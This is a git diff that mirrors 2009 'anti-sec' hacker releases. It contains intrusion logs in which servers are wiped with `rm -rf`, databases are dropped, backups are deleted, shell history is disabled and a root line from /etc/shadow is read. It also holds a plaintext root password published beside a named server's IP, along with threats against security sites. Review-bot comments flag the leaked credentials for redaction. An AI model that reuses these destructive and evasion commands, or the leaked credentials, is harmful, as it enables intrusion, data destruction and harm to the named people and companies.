+-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
+-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
+[snip]
+226 Transfer complete.
+ftp> mdelete *
+ftp> ls -la
+227 Entering Passive Mode (212,254,194,163,2,193)
+150 Opening BINARY mode data connection for 'file list'.
+226 Transfer complete.
+ftp>
+
+sh-3.2# cd /home
+sh-3.2# ls -la
+total 120
+drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
+drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
+drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
+-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
+-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
+drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
+drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
+drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
+drwx--x--x 10 com     com      4096 Apr 28 12:40 com
+drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
+drwx------  3 jon     jon      4096 Sep 21  2007 jon
+drwx------  2 root    root    16384 Sep 11  2007 lost+found
+drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
+drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
+drwx------  2 jon     jon      4096 Sep 15  2007 test
+drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
+
+sh-3.2# rm -rf backup/
+sh-3.2# rm -rf backup.14161/
+sh-3.2# rm -rf ftp/
+sh-3.2# rm -rf jon/
+sh-3.2# rm -rf my/
+sh-3.2# rm -rf mysqldata/
+sh-3.2# rm -rf test/
+sh-3.2# rm -rf tmp/
+sh-3.2# cd ~
+sh-3.2# rm -rf *
+sh-3.2# rm -rf /var/log/
+rm: cannot remove directory `/var/log//proftpd': Directory not empty
+sh-3.2# rm -rf /home/*
+sh-3.2# mysql
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 407156
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++-----------------------+
+| Database              |
++-----------------------+
+| information_schema    |
+| astanet_ads           |
+| astanet_mailing_lists |
+| astanet_mediawiki     |
+| astanet_membersystem  |
+| com_contrexx          |
+| com_contrexx2         |
+| com_contrexx2_live    |
+| da_roundcube          |
+| dolphin               |
+| ideapool              |
+| mysql                 |
+| test                  |
+| yourmaster            |
++-----------------------+
+14 rows in set (0.03 sec)
+
+mysql> drop database astanet_membersystem;
+droQuery OK, 46 rows affected (0.81 sec)
+
+mysql> drop database com_contrexx;
+Query OK, 211 rows affected (2.72 sec)
+
+mysql> drop database com_contrexx2;
+Query OK, 237 rows affected (2.23 sec)
+
+mysql> drop database com_contrexx2_live;
+Query OK, 227 rows affected (7.63 sec)
+
+mysql> drop database ideapool;
+Query OK, 69 rows affected (0.19 sec)
+
+mysql> drop database yourmaster;
+Query OK, 158 rows affected (0.55 sec)
+
+mysql> drop database astanet_ads;
+Query OK, 9 rows affected (0.11 sec)
+
+mysql> drop database astanet_mailing_lists;
+Query OK, 24 rows affected (1.47 sec)
+
+mysql> drop database astanet_mediawiki;
+Query OK, 31 rows affected (0.51 sec)
+
+mysql> show databases;
++--------------------+
+| Database           |
++--------------------+
+| information_schema |
+| da_roundcube       |
+| dolphin            |
+| mysql              |
+| test               |
++--------------------+
+5 rows in set (0.00 sec)
+
+
+
+
+
+
+What a journey! We're not sure exactly why the "Terminator" had any influence on
+their naming (conventions) but we're sure Arnold himself wouldn't be in the
+wrong to say this pack of morons *wont be back*.
\ No newline at end of file
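Review bot: The `select usr_full_name,usr_email,usr_password from eventum_user` result in this hunk commits 15 rows of names, e-mail addresses and 32-hex-character password values (the column is `varchar(32)`, the length of a hex MD5 digest) into the tree, and the FTP session that follows adds the backup server's IP address and login name. For an archive mirror, replace the `usr_email` and `usr_password` cells and the host address with a fixed redaction marker and record that in the README, because git history makes these values permanent once pushed. The file also ends without a trailing newline (`\ No newline at end of file`); add one so that later changes to the file diff cleanly.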
diff --git a/anti-sec/imageshack-pwned.txt b/anti-sec/imageshack-pwned.txt
new file mode 100644
index 0000000..ac81323
--- /dev/null
+++ b/anti-sec/imageshack-pwned.txt
@@ -0,0 +1,95 @@
+
+
+	               __  .__                                
+	_____    _____/  |_|__|           ______ ____   ____  
+	\__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\ 
+	 / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___ 
+	(____  /___|  /__| |__|         /____  >\___  >\___  >
+	     \/     \/                       \/     \/     \/ 
+
+	Proudly presents...
+	
+		 _                                     _                _    
+		(_)                                   | |              | |   
+		 _ _ __ ___   __ _  __ _  ___    ___  | |__   __ _  ___| | __
+		| | '_ ` _ \ / _` |/ _` |/ _ \' / __| | '_ \ / _` |/ __| |/ /
+		| | | | | | | (_| | (_| |  __/  \__ \ | | | (_| | (__|   < 
+		|_|_| |_| |_|\__,_|\__, |\___|  |___/ |_| |_|\__,_|\___|_|\_\
+		                    __/ |                                
+		                   |___/                                 
+
+				   
+	Anti-sec. We're a movement dedicated to the eradication of
+	full-disclosure. We wanted to give everyone an image of what we're all
+	about.
+	
+	Full-disclosure is the disclosure of exploits publicly - anywhere. The
+	security industry uses full-disclosure to profit and develop
+	scare-tactics to convince people into buying their firewalls,
+	anti-virus software, and auditing services.
+	
+	Meanwhile, script kiddies copy and paste these exploits and compile
+	them, ready to strike any and all vulnerable servers they can get a hold
+	of. If whitehats were truly about security this stuff would not be
+	published, not even exploits with silly edits to make them slightly
+	unusable.
+	
+	As an added bonus, if publication wasn't enough, these exploits are
+	mirrored and distributed widely across the Internet with a nice little
+	advertisement embedded in them for the crew or website which first
+	exposed the vulnerability to the public.
+	
+	It's about money. While the world is difficult to change, and money will
+	certainly continue to be a very important in the eyes of many, our
+	battle is that of the removal of full-disclosure for the purpose of
+	making it harder for the security industry to exploit its consequences.
+	
+	It is our goal that, through mayhem and the destruction of all
+	exploitive and detrimental communities, companies, and individuals,
+	full-disclosure will be abandoned and the security industry will be
+	forced to reform.
+	
+	How do we plan to achieve this? Through the full and unrelenting,
+	unmerciful elimination of all supporters of full-disclosure 
+	and the security industry in its present form. If you own a security
+	blog, an exploit publication website or you distribute any exploits... 
+	
+	"you are a target and you will be rm'd. Only a matter of time."
+	
+	This isn't like before. This time everyone and everything is getting
+	owned.
+	
+	
+	
+	Signed: The Anti-sec Movement
+
+		"No images were harmed in the making of this... image."
+
+anti-sec:~/pwn# perl img-scan.pl
+
+Found img1.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
+[snip]
+Found img998.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
+
+anti-sec:~/pwn# perl mass-pwn.pl
+
+Connecting...
+
+Linux worf.imageshack.us 2.6.15-1.2054_FC5 #1 SMP Tue Mar 14 15:48:20 EST 2006 x86_64 x86_64 x86_64 GNU/Linux
+
+Replacing images...
+
+
+img1 --> img998
+
+All images replaced: http://img998.imageshack.us/antisec.jpg
+
+
+
+
+If you think that we oppose your website, our advise is to pack it up and shut it down, because we're coming for you.
+
+	- anti-sec.
+
+
+
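Review bot: The ASCII-art lines at the top of this hunk end in trailing spaces, and the file closes with three blank `+` lines after `- anti-sec.`; `git diff --check` reports both as whitespace errors, and `git apply` warns about them. If the mirror is meant to be byte-exact, say so in the README and unset the check for these files with a `.gitattributes` entry such as `*.txt -whitespace`; otherwise trim the trailing blanks before import.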
diff --git a/anti-sec/romeo-last-stand.txt b/anti-sec/romeo-last-stand.txt
new file mode 100644
index 0000000..7bb280c
--- /dev/null
+++ b/anti-sec/romeo-last-stand.txt
@@ -0,0 +1,291 @@
+
+	                 __   .__
+	_____     ____ _/  |_ |__|  ______  ____   ____
+	\__  \   /    \\   __\|  | /  ___/_/ __ \_/ ___\
+	 / __ \_|   |  \|  |  |  | \___ \ \  ___/\  \___
+	(____  /|___|  /|__|  |__|/____  > \___  >\___  >
+	     \/      \/ # exit	       \/      \/     \/*no more*
+
+
+
+-----[ Intro:
+
+No, romeo.copyandpaste.info did not get hacked, I am just doing what should be done about this mess...
+
+A few companies were getting hacked by anti-sec just now, but I decided you don't deserve to know who gets owned,
+I will keep the access to myself and you will _never_ know you got hacked.
+
+Let me try and make a few things clear.
+
+-----[ The Beginning:
+
+93K Jun  4 astalavista.txt
+
+	This is where it all started, 'anti-sec' the 'group' name was born there, people made up the rest of stories and believed them.
+
+159K Jun 10 nowayout.txt
+
+	He is a moron, 'nuff said.
+
+27K Jul  3 ssanz-pwned.txt
+
+	Swear by your own security, this is where it gets you.
+
+3.4K Jul 10 imageshack-pwned.txt
+
+	Sent the message to everyone, everyone understood it differently.
+
+
+
+--[ Astalavista - The hacking and security community.
+
+	They didn't have hackers, security or a community, I did the Internet a favor by taking them down.
+
+--[ Glafkos / nowayout - The CEH / Security Expert / [Insert-IT-Cert-Here].
+
+	He couldn't stop an attack on his own server, got rm'd and shutdown while he is actually logged on the server...
+	How pathetic.
+
+--[ SSANZ - Server Systems Administration NZ, Security, Hardening and Backup solutions.
+
+	They couldn't secure their servers and had no backups... 'nuff said?
+
+--[ ImageShack.
+
+	Even though it clearly said:
+	"No images were harmed in the making of this... image."
+	Most of you idiots reacted with:
+	"omg what does imageshack have to do with security, those guys are brutal and against their own beliefs".
+
+
+-----[ You are a moron:
+
+
+So a 'group' by the name of 'anti-sec' who are *against full-disclosure* publishes a hack-log with a few exploits used in it...
+
+The whole idea is that you, the script kiddie (along with the rest of the Internet) NEVER knew how anti-sec actually got in, get it now?
+
+	felosi decides it is actually an OpenSSH 0day,
+	WebHosting Talk forums makes a huge hype about it,
+	SANS believes it,
+	HostGator DISABLES OpenSSH on all servers and claims they have a fix for it,
+	TheRegister writes about it...
+
+...and the rest of the Internet and the 'security industry', just like sheep, follows everyone else and
+claims surface of 'patches' for the 0day, some said they will release it on DefCon, others started there
+own fake exploit (Some people actually fell for that)...
+
+You people are a pack of morons, honestly.
+
+I let you talk about it, laughed as some of you started writing patches, then I had my share of lulz when
+hosts decided to shut down OpenSSH because of a rumor that was started by felosi because a client of his
+(nowayout / Glafkos the security expert, remember him?); thought it was an OpenSSH 0day. lol.
+
+This is just another proof of how stupid the people you go to for 'security' online, how easy it is to create
+havoc online amongst you, I didn't even have to start the rumor, your own people did and you believed it.
+
+
+-----[ anti-security:
+
+
+Now off to another, more important point; anti-security...
+
+*This is my idea of anti-security, you are free to have your own, but the ideas I saw online are stupid, really*
+
+Some of you thought anti-security is against -security-, while it is really against the security -industry-,
+I don't want you to be insecure to hack you, where is the challenge in that?
+
+Others thought anti-security is about 0 disclosure of any kind, it is truly against full disclosure, where
+an actual exploit code is posted instead of an advisory to the public...
+
+I understand that disclosure is a must-have, I am not against it, I am against the people who post and help in
+spreading exploit code, Can you please tell me what good (if any) comes out of posting exploit code?
+
+I am pretty sure it does more harm than good, way more. Some suggested anti-sec should give people an alternative
+of what should be done, well here it is, sirs..
+
+Instead of posting an exploit code for the vulnerability you found, post an advisory, explain the vulnerability you found
+to the people, gain fame and credit from it, attach a PoC if necessary... but do NOT post an exploit!
+
+Now of course that will not stop 'hackers' from hacking, but it will decrease the number of random attacks, a lot,
+and everyone will benefit from it, you will gain your fame and credit for it, you can post that on your sorry ass CV.
+
+
+-----[ Comments and Response:
+
+
+#bhf <+Aelphaeis> antisec hacked BHF ?
+#bhf <+Aelphaeis> won't the antisec guys do it again ?
+#bhf <+Aelphaeis> antisec, makes no fucking sense
+#bhf <+Aelphaeis> BHF is clearly pro antisec
+
+	You are as stupid as you sound.
+
+#bhf <%Glyph> 1. romeo.copyandpaste.info is a rr account.
+#bhf <%Glyph> 2. romeo.copyandpaste.info's ns entries point to afraid.org
+
+	ORLY?
+
+#bhf  < HTH> I wonder who anti-sec is lulz
+#bhf  < HTH> Ive long since decided its not dark
+#bhf  < HTH> or r0meo
+#bhf  < HTH> so now im puzzled
+
+	I lol'd.
+
+#bhf < fr0natz> HTH, I see that point.
+#bhf < fr0natz> Romeo, lul'd a bit there.
+
+	So did he.
+
+>>T Biehn < tbiehn@gmail.com>
+>>1) Register 'Anti-Sec *' with Free Mail Provider
+>>2) Claims to Full Disclosure
+>>3) ????
+>>4) PROFIT.
+
+	True that.
+
+>>ifwm
+>>So, Anti-sec is Microsoft?
+
+	No.
+
+>>DrGirlfriend
+>>what a group of assholes (anti-sec, not imagshack). Seriously, in what way was imageshack involved in their beef with the security profession?
+
+	What a moron.
+
+>>siggplus
+>>So hackers are against full disclosure? What a shocker.
+
+	I know right?
+
+>>oobey
+>>Woah, guys! I just discovered the most amazing thing - if you don't talk about bad things,
+>>it's like they DON'T EXIST AT ALL!! As far as I'm concerned, I'm no longer living in a world with an economic crisis,
+>>global warming, OR wars in the Middle East!
+>>
+>>Thanks, anti-sec!
+
+	As DarkPontifex would say, Cool story bro.
+	It is more like, if you do not practice, publish or mirror exploits, script kiddies wont exist at all and the world will be a better place!
+
+	No problem, btw.
+
+>>SyrioForel
+>>They're not trying to protect anybody from exploits, they're trying to protect their own exploits from being advertised. Get it?
+
+	Oh okay, thanks for clearing that up for me...
+	You are wrong, it is truly about not publishing exploits, you will not get our exploits because no one knows how we get in, when we got in, etc.
+
+>>freshtimes
+>>I don't think they're attacking you as much as using imageshack's prevalence across the internet
+>>as a way to embed images as a vehicle for their message.
+
+	Finally someone gets it.
+
+>>Clumpy
+>>A self-righteous stupid hacker group at that. Full disclosure is the only thing that causes companies to patch.
+>>History shows us, over and over again, that companies won't spend the money to patch security holes without full disclosure forcing them to it.
+
+	If you are so concerned about the patch, why don't you release a patch yourself instead of releasing an exploit code to 'force them to patch'.
+
+>>alchemeron
+>>A short-sighted approach. Part of the reason for a culture of published exploits is that,
+>>if you don't publish or threaten to publish, companies will do absolutely nothing.
+
+	If everyone works by that, a lot more 'security' companies will be exposed, hacked and rm'd, because if you don't publish that they
+	cannot secure their own work, make backups or actually provide the service they offer, they will never fix it, right?
+
+	What about posting a nice advisory, saying you found vulnerability X in product Y, maybe a PoC. if company doesn't fix, you did your job,
+	no need to publish an exploit code and make thousands of websites / companies suffer while script kiddies ./xploit.
+
+
+>>anti-antisec@hushmail.com
+>>LMH, can you and your "Security Justice" friends please get laid
+>>and leave the rest of us alone? This Anti-Sec rebranding is more
+>>boredom.
+>>
+>>Oh- we know where you work, and who some of you really are. I
+>>wonder how they'd feel about this stupidity?
+
+	You don't know anything about any of us and you will never.
+	Your servers were rooted back in 2007 and we never lost access until 2009 (maybe not), how do you feel about this stupidity?
+
+>>Ant-Sec Movement < anti.sec.movement@gmail.com>
+>>Dear Reader,
+>>
+>>In light of recent events, we have decided to clarify exactly what the Anti-Sec Movement is, and who we really are.
+>>Firstly, Anti-Sec is NOT an individual clan or group; as the name implies, we are a movement
+>>< snipped>
+
+	You have nothing to do with the movement, you saw a wave of people and posts talking about anti-sec and wanted to get some
+	attention on your sorry ass.
+
+	Your targets are still up, all you ever did was a pathetic DDoS attack. You fail.
+
+>>http://www.theregister.co.uk/2009/07/13/imageshack_hack/
+>>Ironically, exploit code associated with Anti-Sec's latest attack was posted on a full disclosure mailing list.
+
+	Nothing was ever posted, k?
+
+
+...and many, many other stupid comments.
+
+
+-----[ Outro:
+
+
+Well I guess this is it, publicly owning people goes nowhere, people are too stupid, some love to make up their own stories
+and others will do anything to ride a publicity wave... rarely ever anyone actually gets the point.
+
+
+Before I leave you, I cannot stress enough that you are not as secure as you think you are,
+Full-Disclosure brings more evil than good, it is the root of most DDoS attacks, random web defacement, spam, havoc, etc.
+
+Publish an advisory if you must, do -not- publish an exploit, do -not- mirror exploits.
+
+str0ke should realize by now that most of the botnets out there, the spam, the Turkish web defacement... is his fault.
+
+If you think otherwise, do post about it, be sure that I will be reading it, but I doubt you can find more good coming out
+of full-disclosure than evil.
+
+And of course we must not forget, it is not just about Full-Disclosure, but also the people who claim they can protect you,
+claim they are a security company, swear by their own security, etc. Actually cannot provide you with that service, they
+cannot protect you, they cannot protect themselves, they don't know the basics of security, they read a tutorial on installing
+CSF/LFD, mod_security, iptable OpenSSH and call it -secure-.
+
+
+Take felosi for example, he runs secureservtech:
+
+>>Extensive security to protect your sites and data from hackers.
+>>Including mod_security, suhosin, cgi suexec,, php suexec, brute force protection on all protocols and more..
+
+72.20.1.206 - backup.secureservtech.com - The main backup server for SST, it has access to every other server SST owns.
+
+root:T6yHjuIkol0
+
+*OpenSSH is whitelisted for specific IP's only, he included mod_security, suhosin patch, grsecurity, csf/lfd... How classic.
+
+
+	Did he protect his customers from hackers like he says? is *secure*servtech really *secure*? does felosi know he got owned?
+	No.
+
+
+- Did you get scared of getting caught?
+-- no, I just didn't like how this turned out to be, taking a different approach from now on.
+
+- Are you going to stop shutting down people who publish exploits, exposing people who swear by their own security, etc?
+-- no, but this time you will never know who got owned, no logs will be published, I will keep my access for greater benefit.
+
+If you want the old page for any reason, you can download mirror here: http://romeo.copyandpaste.info/mirror.tgz
+
+
+
+	So Long, and Thanks for All the Fish.
+	- romeo.
+
+
+
+
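Review bot: Near the end of this hunk, the `backup.secureservtech.com` line is followed by a `root:` line that commits a plaintext root password next to the server's IP address, and the `>>T Biehn` and `>>Ant-Sec Movement` attribution lines in the comments section carry third-party e-mail addresses. Replace the password with a marker such as `root:[REDACTED]` and mask the addresses before importing; the text's argument reads the same without them, and it keeps a credential in usable form out of permanent git history.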
diff --git a/anti-sec/ssanz-pwned.txt b/anti-sec/ssanz-pwned.txt
new file mode 100644
index 0000000..51cfe1e
--- /dev/null
+++ b/anti-sec/ssanz-pwned.txt
@@ -0,0 +1,679 @@
+	               __  .__                                
+	_____    _____/  |_|__|           ______ ____   ____  
+	\__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\ 
+	 / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___ 
+	(____  /___|  /__| |__|         /____  >\___  >\___  >
+	     \/     \/                       \/     \/     \/
+						
+					Some of you have seen a lot of casualties lately in the webhosting scene:
+					hosting companies being wiped and rm'd at the expense of their clients. While
+					some of this is collateral damage, we're about to show you, ladies and
+					gentlemen, that sometimes you aren't pwned because of who you host but what you
+					say.
+						
+						Practice what you preach.
+
+- Why SSANZ?
+
+Owned by a kid who claims he can manage, secure and audit servers,
+he offers a service that he clearly cannot provide, we are against that.
+
+
+LoganNZ :
+
+>>Logan of New Zealand. CEO of Server Systems Administration NZ.
+>>
+>> Signature:	
+>>Server Systems Administration NZ | SSANZ
+>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
+>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
+	
+Server Management $25 - Security & Hardening - $50 :
+ 
+
+>>Server Management - $25 Per Month
+>>
+>>- Full Management - Support, & 3rd Party Installs
+>>- Monitoring - Included - up to 3 ports.
+>>- Emergency Recovery
+
+
+>>Server Security - $50
+>>
+>>- Initial Scan & Report
+>>- Security Hardening & Security Installs/tweaks.
+>>- IDS, Security Monitoring & mod_sec configured.
+>>- Finishing Security Scan & SSANZ Custom Scans.
+>>
+>>
+>>Emergency Server Recovery - $150
+>>
+>>- Recover Hacked Server Systems
+>>- Recover deleted data
+>>- ANTI-dDOS Services
+>>- dDOS Investigation
+
+Security Worries? Security Audits - 50% OFF  :
+
+>>Get your site/server audited to ensure your business data is
+>>secure before you become a statistic.
+>>
+>>In the past 6 months, e-crime activity reports have increased by
+>>45% due to the global economic recession.
+>>
+>>What is involved in a Full Security Audit?
+>>
+>>External Security
+>>
+>>    * Scan for Shells/malicious scripts
+>>    * Scan for vulnerable web content ( permissions, RFI's )
+>>    * Scans for Vulnerable Server Services
+>>    * Vulnerable Ports
+>>    * Testing of TCP handling - dDOS test.
+>>    * Scan for Vulnerable PHP scripts/mods.
+>>    * Control Panel Security Audit ( external )
+>>    * Multiple Unique SSANZ Custom Scans*
+>>
+>>
+>>Internal Security
+>>
+>>    * Permissions/Ownership(s) Review
+>>    * Apache/Webserver Security
+>>    * User Account Security & binaries access audit
+>>    * Local RFI Exploits located/patched.
+>>    * System Binary Security Audit
+>>    * Firewall/IPTABLES Audit
+>>    * Bruteforce detection test & audit
+>>    * Root Access Authentication Audit
+>>    * Local PHP Functions Audit
+>>    * Control Panel Security Audit ( Internal )
+>>    * Kernel Security Audit
+>>    * Additional SSANZ Custom Scans/Audit*
+
+We at anti-sec decided to give you a _FREE_ Full Security Audit!*
+
+* `rm -rf /` is included.
+
+
+anti-sec:~/pwn# ./map ssanz.net
+	
+	IP: 66.197.143.133 ( osiris.ssanz.net )
+	WWW: Apache/2.2.11
+	SSH: SSH-2.0-OpenSSH_4.3
+	
+	IP: 66.197.204.101 ( devil.ssanz.net )
+	WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
+	SSH: SSH-2.0-OpenSSH_4.3
+
+anti-sec:~/pwn# cd xpl/
+
+anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
+
+		[+] 0wn0wn - anti-sec group
+		[+] Target: 66.197.143.133
+		[+] SSH Port: 22
+		
+		[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+
+sh-3.2# export HISTFILE=/dev/null
+
+sh-3.2# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+
+sh-3.2# uname -a
+Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
+
+sh-3.2# head -n1 /etc/shadow
+root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
+
+sh-3.2# w
+ 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop
+
+sh-3.2# pwd
+/root
+
+sh-3.2# ls -la
+total 3008
+drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
+drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
+-rw-------  1 root     root         957 Jun 13 07:24 .accesshash
+-rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
+-rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
+-rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
+drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
+-rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
+drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
+-rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
+drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
+-rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
+drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
+drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
+drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
+drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
+-rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
+-rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
+drwx------  2 root     root        4096 Jun  1 13:54 .elinks
+-rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
+-rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
+drwx------  3 root     root        4096 Jun  1 10:39 .gconf
+drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
+drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
+drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
+drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
+-rw-r--r--  1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
+-rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
+-rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
+-rw-r--r--  1 root     root        4246 Jun  1 10:39 install.log.syslog
+drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
+-rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
+-rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
+-rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
+-rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
+drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
+-rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
+-rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
+-rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
+-rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
+drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
+drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
+-rw-------  1 root     root        1024 Jun  7 19:50 .rnd
+drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
+drwx------  2 root     root        4096 Jun  2 06:41 .ssh
+-rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
+drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
+-rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
+drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
+drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups
+
+
+
+sh-3.2# cat .bash_history
+htop
+htop
+p
+htop
+tail -f /var/log/secure
+tail -f /var/log/secure
+[snip]
+nano highperformance.conf
+service httpd restart
+nano highperformance.conf
+service httpd restart
+nano highperformance.conf
+nano httpd.conf
+nano php.conf
+ls
+nano modsec2.conf
+ls
+[snip]
+nano visit4cash.net.conf
+cd ..
+[snip]
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+ps -aux|grep -i HTTP|wc -l
+w
+bwm-ng
+[snip]
+netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
+netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
+netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
+netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
+netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
+netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
+netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
+netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
+[snip]
+/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
+/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
+/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+[snip]
+service cups stop
+chkconfig cups off
+service nfslock stop
+chkconfig nfslock off
+service rpcidmapd stop
+chkconfig rpcidmapd off
+service bluetooth stop
+chkconfig bluetooth off
+service anacron stop
+chkconfig anacron off
+service avahi-daemon stop
+chkconfig avahi-daemon off
+service hidd stop
+chkconfig hidd off
+service pcscd stop
+chkconfig pcscd off
+[snip]
+http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
+screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
+htop
+screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
+[snip]
+wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
+htop
+[snip]
+wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
+wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
+[snip]
+wget http://www.logview.org/logview-install
+chmod +x logview-install
+./logview-install
+rm -rf logview-install
+
+sh-3.2# grep sec /etc/userdomains
+affiliatesecrets.wecloak.info: wecloaki
+infosecawareness.info: andlyssa
+secproxy.info: secproxy
+infosecawareness.andly.ssanz.net: andlyssa
+greycloud.nakedinsects.com: greyclou
+serversecuritynz.com: forumz
+orac.nakedinsects.com: oracnz
+infernal.nakedinsects.com: infernal
+nakedinsects.com: ni
+fluffy.nakedinsects.com: fluffy
+quickclix.orac.nakedinsects.com: oracnz
+seco39.ssanz.net: secossan
+
+sh-3.2# lastlog | grep -v Never
+Username         Port     From             Latest
+root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
+simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
+mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
+etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009
+
+sh-3.2# cd ~billing
+sh-3.2# ls -la
+total 301252
+drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
+drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
+lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
